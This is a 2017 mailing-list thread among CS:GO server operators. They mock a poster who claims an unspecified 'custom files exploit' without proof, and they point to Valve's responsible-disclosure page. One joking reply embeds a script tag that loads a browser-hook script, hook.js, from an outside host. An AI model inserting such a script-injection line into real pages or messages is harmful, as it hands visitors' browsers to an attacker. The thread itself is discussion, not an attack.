ITSec. PoC.

Sincerely,
Ryan "ExpertMode" Bentley
Independent IT Field Engineer

On Tue, Oct 10, 2017 at 6:50 PM, Nathaniel Theis <[email protected]> wrote:
> hello I have injected a JavaScript into this email you are all now hacked
>
> what do you mean it won't run without an actual vulnerability
>
> you're super mega hacked
>
> <script src=//xmppwocky.net/hook.js></script>
>
> On Oct 10, 2017 10:02 AM, "iNilo" <[email protected]> wrote:
>
>> I frankly don't care what / where / how you work, or what you have
>> studied.
>>
>> The only thing I know is that this is clearly the wrong channel to do
>> argue/disclose/chat about.
>>
>> http://www.valvesoftware.com/security/
>>
>> Hopefully you get thanked in a patch note, if not I'm sure the entire
>> community will be grateful that you disclosed a major security issue to the
>> people that *actually* get paid to take care of this.
>>
>> Thanks.
>>
>> 2017-10-10 18:54 GMT+02:00 Saint K. <[email protected]>:
>>
>>> Christopher,
>>>
>>> I work in “the field” as you like to call it. It’s customary to explain
>>> the exploit in detail and provide proof of the concept (hence the request for
>>> a PoC) in any form or way.
>>>
>>> Please demonstrate the issue, be it by posting the offending code, you
>>> recording a video showing a working exploit, or anything along these lines.
>>>
>>> You should know this, if you work in “the field”.
>>>
>>> Regards,
>>>
>>> Saint K.
>>>
>>> *From:* Csgo_servers [mailto:[email protected]]
>>> *On Behalf Of* Stealth Mode
>>> *Sent:* 10 October 2017 18:34
>>> *To:* [email protected]
>>> *Subject:* Re: [Csgo_servers] Custom files exploit
>>>
>>> @Ryan, etc.
>>>
>>> I studied radio electronics before IT was a thing. NetSec and ITSec go
>>> hand in hand. My credentials aren't CS, because CS was radio electronics.
>>> The industry hasn't changed, just a little more vulnerable. Not like I am
>>> specifically stating how to inject code, or what code to inject on a public
>>> mailing list. Don't need to. Professionals here know what I am referring
>>> to. I guess the rest do not have the knowledge to understand what the
>>> exploit can actually do. You are aware. That is all that matters. Don't
>>> secure your servers, that is on you. When they get exploited, that is on
>>> you.
>>>
>>> Have a nice day! End of discussion. No further communications.
>>>
>>> Sincerely,
>>>
>>> Christopher "StealthMode" Stephen Larkins
>>>
>>> Independent IT Field Engineer
>>>
>>> fieldnation.com
>>>
>>> workmarket.com
>>>
>>> onforce.com
>>>
>>> clearancejobs.com
>>>
>>> On Tue, Oct 10, 2017 at 12:09 PM, Ryan Bentley <[email protected]> wrote:
>>>
>>> My sides at this thread. At first I just rolled my eyes but now I
>>> actually believe that Stealth Mode is either a troll or delusional. Please
>>> stop saying "ITSec". Any first year CS student knows what PoC is but you
>>> don't? Please.
>>>
>>> You are embarrassing yourself. Which institution did you get your
>>> degree? It must be a very old BSc indeed. You talk complete nonsense and
>>> have a fundamental misunderstanding of basic computer science tenets.
>>>
>>> On Tue, Oct 10, 2017 at 4:34 PM, Nomaan Ahmad <[email protected]>
>>> wrote:
>>>
>>> Nice hat there. Stealth might get this one though:
>>> https://i.imgur.com/329jfXt.gif
>>>
>>> On 10 Oct 2017 4:29 pm, "PistonMiner" <[email protected]> wrote:
>>>
>>> The person in question should never have written a message about an open
>>> vulnerability into a public mailing list in the first place. Just because
>>> they did doesn't mean that you should ask for PoCs in public mailing lists,
>>> there's a multitude of issues with that.
>>> To make it perfectly clear, I'm not defending this person, I seriously
>>> doubt the seriousness of their statements and a lot of what they're saying
>>> makes no sense at all and looks like trying to maintain an image of
>>> competence while knowing little, but responsible disclosure still applies.
>>> If this person has a vulnerability to report, they should do so with the
>>> information listed at http://www.valvesoftware.com/security/.
>>> And I think I know what I'm talking about seeing as I have two Finder's
>>> Fees. See https://wiki.teamfortress.com/wiki/Finder%27s_Fee and
>>> https://wiki.teamfortress.com/wiki/List_of_Finder%27s_Fee_owners
>>>
>>> On 10.10.2017 17:08, Vaya wrote:
>>>
>>> I think someone needs to ‘stealth mode’ out of this email chain. This is
>>> just noise without a repeatable Test
>>>
>>> Sent from my iPhone
>>>
>>> On 10 Oct 2017, at 16:01, PistonMiner <[email protected]> wrote:
>>>
>>> If you have a vulnerability to report, don't do it in a public mailing
>>> list. Report it directly to Valve, and no place else. This conversation has
>>> so many problems, but asking for a PoC in a *public* mailing list is
>>> one of them. Look up responsible disclosure. (I should note though, at this
>>> point I am not convinced a vulnerability even exists.)
>>>
>>> --
>>>
>>> PistonMiner (Linus S.)
>>>
>>> _______________________________________________
>>> Csgo_servers mailing list
>>> [email protected]
>>> https://list.valvesoftware.com/cgi-bin/mailman/listinfo/csgo_servers
>>>
>>> --
>>>
>>> PistonMiner (Linus S.)
